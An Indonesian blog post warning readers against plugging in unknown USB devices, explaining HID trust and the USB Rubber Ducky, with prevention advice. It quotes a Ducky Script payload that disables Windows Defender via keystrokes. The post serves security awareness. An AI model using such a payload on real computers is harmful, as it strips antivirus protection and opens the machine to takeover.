Jangan asal colok USB!

   JANGAN ASAL COLOK USB! Apapun perangkat usb itu baik itu external storage, keyboard, mouse, dan lain sebagainya. Karena perangkat usb tersebut bisa di injeksi oleh virus atau malware berbahaya yang bisa mengambil semua data sensitif kamu. Bahkan, antivirus secanggih apapun tidak bisa mencegahnyal lho.

Kok bisa?

Jadi gini ya, semua perangkat komputer disemua sistem operasi yang tersedia untuk komputer selalu percaya penuh kepada seluruh perangkat usb. Makanya, kalo lu nyolokin mouse di komputer lu pasti komputer lu gak nanya ' mau dipake gak mousenya? ' pasti komputer lu langsung meng-aktifkan mouse tersebut.

Nah karena komputer selalu percaya atas seluruh perangkat usb yang dihubungkan ke komputer tersebut, memberikan celah keamanan yang cukup berbahaya nih. Dimana usb tersebut akan mendapatkan akses penuh terhadap komputer tersebut. Salah satu usb yang paling berbahaya untuk celah keamanan ini adalah Bad Usb Rubber Ducky.

Rubber Ducky

USB yang satu ini adalah usb yang diciptakan untuk keperluang hacking. Dimana pada usb ini, hardware nya sudah dimodifikasi sedemikian rupa sehingga komputer akan membaca usb ini sebagai keyboard.
Sumber gambar: hakshop.com
Untuk menggunakan usb ini, hacker hanya perlu menyisipkan script khusus. Misalnya :
REM turn off windows defender then clear action center
REM author:judge2020
REM You take responsibility for any laws you break with this, I simply point out the security flaw
REM
REM start of script
REM
REM let the HID enumerate
DELAY 2000
ESCAPE
DELAY 100
CONTROL ESCAPE
DELAY 100
STRING Windows Defender Settings
ENTER
DELAY 2000
REM why TAB and HOME?
TAB
DELAY 50
REM why TAB and HOME?HOME
DELAY 50
ALT F4
DELAY 3200
REM windows + a = ????
GUI a 
DELAY 500
ENTER
DELAY 100
GUI a
Script diatas berfungsi untuk me-nonaktifkan windows defendernya windows. Nah, yang lebih kerennya lagi, hacker tidak perlu melakukan aktifitas fisik apapun untuk menjalankan aksinya. Dimana hanya perlu mencolok usb ke komputer yang dimaksud, dan menunggunya untuk beberapa saat sampai prosesnya selesai.

Kalo lu penasaran gimana cara kerjanya, lu bisa nonton vidio yang satu ini :


Cuma 15 detik buat ngambil alih komputer lu. Gila gila gila..

Pencegahan

Pencegahan yang bisa lu lakukan adalah dengan tidak asal colok usb, ya seperti judulnya. Dan selalu berhati-hati ketika mau mencolokkan usb. usb disini gak cuma external storage, atau flashdrive. Tapi apapun itu yang menggunakan usb. Karena semuanya bisa dimodifikasi oleh hacker. Termasuk juga perangkat android.

0 Comments

Silahkan bebas berkomentar disini. Jangan nyepam link aktif, dan harap gunakan kata yang sopan.
EmoticonEmoticon